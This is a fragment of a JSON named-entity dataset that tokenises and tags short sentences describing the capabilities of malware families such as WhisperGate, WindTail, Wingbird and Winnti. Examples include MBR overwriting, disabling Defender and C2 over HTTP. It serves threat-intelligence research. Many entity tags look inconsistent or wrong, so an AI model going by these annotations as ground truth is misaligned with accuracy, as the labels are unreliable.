"corrupt", + "files", + "by", + "overwriting", + "the", + "first", + "1", + "MB", + "with", + "`0xcc`", + "and", + "appending", + "random", + "extensions." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "deobfuscate", + "downloaded", + "files", + "stored", + "in", + "reverse", + "byte", + "order", + "and", + "decrypt", + "embedded", + "resources", + "using", + "multiple", + "XOR", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "download", + "and", + "execute", + "AdvancedRun.exe", + "to", + "disable", + "the", + "Windows", + "Defender", + "Theat", + "Protection", + "service", + "and", + "set", + "an", + "exclusion", + "path", + "for", + "the", + "C:\\", + "drive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "overwrite", + "sectors", + "of", + "a", + "victim", + "host's", + "hard", + "drive", + "at", + "periodic", + "offsets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "overwrite", + "the", + "Master", + "Book", + "Record", + "(MBR)", + "on", + "victim", + "systems", + "with", + "a", + "malicious", + "16-bit", + "bootloader." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "Base64", + "encode", + "strings,", + "store", + "downloaded", + "files", + "in", + "reverse", + "byte", + "order,", + "and", + "use", + "the", + "Eazfuscator", + "tool", + "to", + "obfuscate", + "its", + "third", + "stage." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "delete", + "tools", + "from", + "a", + "compromised", + "host", + "after", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "locate", + "files", + "based", + "on", + "hardcoded", + "file", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "download", + "additional", + "stages", + "of", + "malware", + "from", + "a", + "Discord", + "CDN", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "has", + "used", + "`InstallUtil.exe`", + "as", + "part", + "of", + "its", + "process", + "to", + "disable", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "has", + "been", + "disguised", + "as", + "a", + "JPG", + "extension", + "to", + "avoid", + "detection", + "as", + "a", + "malicious", + "PE", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "has", + "used", + "the", + "`ExitWindowsEx`", + "to", + "flush", + "file", + "buffers", + "to", + "disk", + "and", + "stop", + "running", + "processes", + "and", + "other", + "API", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "enumerate", + "connected", + "remote", + "logical", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "use", + "PowerShell", + "to", + "support", + "multiple", + "actions", + "including", + "execution", + "and", + "defense", + "evasion." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "has", + "the", + "ability", + "to", + "inject", + "its", + "fourth", + "stage", + "into", + "a", + "suspended", + "process", + "created", + "by", + "the", + "legitimate", + "Windows", + "utility", + "`InstallUtil.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate's", + "downloader", + "can", + "reverse", + "its", + "third", + "stage", + "file", + "bytes", + "and", + "reflectively", + "load", + "the", + "file", + "as", + "a", + ".NET", + "assembly." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "recognize", + "the", + "presence", + "of", + "monitoring", + "tools", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "download", + "and", + "execute", + "AdvancedRun.exe", + "via", + "`sc.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "stop", + "its", + "execution", + "when", + "it", + "recognizes", + "the", + "presence", + "of", + "certain", + "monitoring", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "has", + "the", + "ability", + "to", + "enumerate", + "fixed", + "logical", + "drives", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "shutdown", + "a", + "compromised", + "host", + "through", + "execution", + "of", + "`ExitWindowsEx`", + "with", + "the", + "`EXW_SHUTDOWN`", + "flag." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "pause", + "for", + "20", + "seconds", + "to", + "bypass", + "antivirus", + "solutions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "use", + "a", + "Visual", + "Basic", + "script", + "to", + "exclude", + "the", + "`C:\\`", + "drive", + "from", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "make", + "an", + "HTTPS", + "connection", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "download", + "additional", + "payloads", + "hosted", + "on", + "a", + "Discord", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wiarp", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "download", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Wiarp", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "inject", + "files", + "into", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wiarp", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "open", + "a", + "command", + "line", + "interface." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wiarp", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "create", + "a", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WinMM", + "is", + "usually", + "configured", + "with", + "primary", + "and", + "backup", + "domains", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WinMM", + "sets", + "a", + "WH_CBT", + "Windows", + "hook", + "to", + "search", + "for", + "and", + "capture", + "files", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WinMM", + "sets", + "a", + "WH_CBT", + "Windows", + "hook", + "to", + "collect", + "information", + "on", + "process", + "creation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WinMM", + "collects", + "the", + "system", + "name,", + "OS", + "version", + "including", + "service", + "pack,", + "and", + "system", + "install", + "date", + "and", + "sends", + "the", + "information", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WinMM", + "uses", + "NetUser-GetInfo", + "to", + "identify", + "that", + "it", + "is", + "running", + "under", + "an", + "“Admin”", + "account", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WinMM", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "use", + "the", + "macOS", + "built-in", + "zip", + "utility", + "to", + "archive", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "can", + "identify", + "and", + "add", + "files", + "that", + "possess", + "specific", + "file", + "extensions", + "to", + "an", + "array", + "for", + "archiving." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "decrypt", + "strings", + "using", + "hard-coded", + "AES", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "can", + "be", + "delivered", + "as", + "a", + "compressed,", + "encrypted,", + "and", + "encoded", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "automatically", + "exfiltrate", + "files", + "using", + "the", + "macOS", + "built-in", + "utility", + "/usr/bin/curl." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "receive", + "and", + "execute", + "a", + "self-delete", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "enumerate", + "the", + "users", + "home", + "directory", + "and", + "the", + "path", + "to", + "its", + "own", + "application", + "bundle." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "can", + "instruct", + "the", + "OS", + "to", + "execute", + "an", + "application", + "without", + "a", + "dock", + "icon", + "or", + "menu." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "been", + "incompletely", + "signed", + "with", + "revoked", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "used", + "icons", + "mimicking", + "MS", + "Office", + "files", + "to", + "mask", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "can", + "invoke", + "Apple", + "APIs", + "<code>contentsOfDirectoryAtPath</code>,", + "<code>pathExtension</code>,", + "and", + "(string)", + "<code>compare</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "generate", + "the", + "current", + "date", + "and", + "time." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "can", + "use", + "the", + "<code>open</code>", + "command", + "to", + "execute", + "an", + "application." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WindTail", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Credential", + "Editor", + "can", + "dump", + "credentials." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Winexe", + "installs", + "a", + "service", + "on", + "the", + "remote", + "system,", + "executes", + "the", + "command,", + "then", + "uninstalls", + "the", + "service." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Wingbird", + "side", + "loads", + "a", + "malicious", + "file,", + "sspisrv.dll,", + "in", + "part", + "of", + "a", + "spoofed", + "lssas.exe", + "service." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "exploits", + "CVE-2016-4117", + "to", + "allow", + "an", + "executable", + "to", + "gain", + "escalated", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "deletes", + "its", + "payload", + "along", + "with", + "the", + "payload's", + "parent", + "process", + "after", + "it", + "finishes", + "copying", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "drops", + "a", + "malicious", + "file", + "(sspisrv.dll)", + "alongside", + "a", + "copy", + "of", + "lsass.exe,", + "which", + "is", + "used", + "to", + "register", + "a", + "service", + "that", + "loads", + "sspisrv.dll", + "as", + "a", + "driver.", + "The", + "payload", + "of", + "the", + "malicious", + "driver", + "(located", + "in", + "its", + "entry-point", + "function)", + "is", + "executed", + "when", + "loaded", + "by", + "lsass.exe", + "before", + "the", + "spoofed", + "service", + "becomes", + "unstable", + "and", + "crashes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "performs", + "multiple", + "process", + "injections", + "to", + "hijack", + "system", + "processes", + "and", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "checks", + "for", + "the", + "presence", + "of", + "Bitdefender", + "security", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "uses", + "services.exe", + "to", + "register", + "a", + "new", + "autostart", + "service", + "named", + "\"Audit", + "Service\"", + "using", + "a", + "copy", + "of", + "the", + "local", + "lsass.exe", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "checks", + "the", + "victim", + "OS", + "version", + "after", + "executing", + "to", + "determine", + "where", + "to", + "drop", + "files", + "based", + "on", + "whether", + "the", + "victim", + "is", + "32-bit", + "or", + "64-bit." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wingbird", + "uses", + "services.exe", + "to", + "register", + "a", + "new", + "autostart", + "service", + "named", + "\"Audit", + "Service\"", + "using", + "a", + "copy", + "of", + "the", + "local", + "lsass.exe", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "decoded", + "XOR", + "encoded", + "strings", + "holding", + "its", + "configuration", + "upon", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "can", + "encode", + "its", + "configuration", + "file", + "with", + "single-byte", + "XOR", + "encoding." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "the", + "ability", + "to", + "deploy", + "modules", + "directly", + "from", + "command", + "and", + "control", + "(C2)", + "servers,", + "possibly", + "for", + "remote", + "command", + "execution,", + "file", + "exfiltration,", + "and", + "socks5", + "proxying", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "B-Purp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "used", + "ICMP,", + "custom", + "TCP,", + "and", + "UDP", + "in", + "outbound", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "used", + "a", + "modified", + "copy", + "of", + "the", + "open-source", + "userland", + "rootkit", + "Azazel,", + "named", + "libxselinux.so,", + "to", + "hide", + "the", + "malware's", + "operations", + "and", + "network", + "activity." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "used", + "a", + "custom", + "TCP", + "protocol", + "with", + "four-byte", + "XOR", + "for", + "command", + "and", + "control", + "(C2)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "used", + "a", + "passive", + "listener,", + "capable", + "of", + "identifying", + "a", + "specific", + "magic", + "value", + "before", + "executing", + "tasking,", + "as", + "a", + "secondary", + "command", + "and", + "control", + "(C2)", + "mechanism." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Linux", + "has", + "used", + "HTTP", + "in", + "outbound", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "use", + "a", + "variant", + "of", + "the", + "sysprep", + "UAC", + "bypass." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Winnti", + "for", + "Windows", + "dropper", + "can", + "decrypt", + "and", + "decompresses", + "a", + "data", + "blob." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "has", + "the", + "ability", + "to", + "encrypt", + "and", + "compress", + "its", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Winnti", + "for", + "Windows", + "dropper", + "component", + "can", + "verify", + "the", + "existence", + "of", + "a", + "single", + "command", + "line", + "parameter", + "and", + "either", + "terminate", + "if", + "it", + "is", + "not", + "found", + "or", + "later", + "use", + "it", + "as", + "a", + "decryption", + "key." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-SecTeam", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Winnti", + "for", + "Windows", + "HTTP/S", + "C2", + "mode", + "can", + "make", + "use", + "of", + "an", + "external", + "proxy." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "delete", + "the", + "DLLs", + "for", + "its", + "various", + "components", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "check", + "for", + "the", + "presence", + "of", + "specific", + "files", + "prior", + "to", + "moving", + "to", + "the", + "next", + "phase", + "of", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Winnti", + "for", + "Windows", + "dropper", + "can", + "place", + "malicious", + "payloads", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-SecTeam", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Winnti", + "for", + "Windows", + "HTTP/S", + "C2", + "mode", + "can", + "make", + "use", + "of", + "a", + "local", + "proxy." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Winnti", + "for", + "Windows", + "implant", + "file", + "was", + "named", + "ASPNET_FILTER.DLL,", + "mimicking", + "the", + "legitimate", + "ASP.NET", + "ISAPI", + "filter", + "DLL", + "with", + "the", + "same", + "name." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "use", + "Native", + "API", + "to", + "create", + "a", + "new", + "process", + "and", + "to", + "start", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "communicate", + "using", + "custom", + "TCP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "check", + "if", + "the", + "explorer.exe", + "process", + "is", + "responsible", + "for", + "calling", + "its", + "install", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "add", + "a", + "service", + "named", + "<code>wind0ws</code>", + "to", + "the", + "Registry", + "to", + "achieve", + "persistence", + "after", + "reboot." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Winnti", + "for", + "Windows", + "installer", + "loads", + "a", + "DLL", + "using", + "rundll32." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "run", + "as", + "a", + "service", + "using", + "svchost.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "XOR", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "determine", + "if", + "the", + "OS", + "on", + "a", + "compromised", + "host", + "is", + "newer", + "than", + "Windows", + "XP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "can", + "set", + "the", + "timestamps", + "for", + "its", + "worker", + "and", + "service", + "components", + "to", + "match", + "that", + "of", + "cmd.exe." + ], 